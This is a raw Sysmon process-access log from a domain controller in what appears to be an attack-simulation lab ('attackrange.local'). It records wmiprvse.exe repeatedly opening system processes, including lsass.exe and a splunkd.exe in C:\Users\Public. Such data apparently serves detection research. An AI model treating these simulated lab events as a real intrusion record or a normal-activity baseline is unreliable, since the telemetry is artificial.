15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 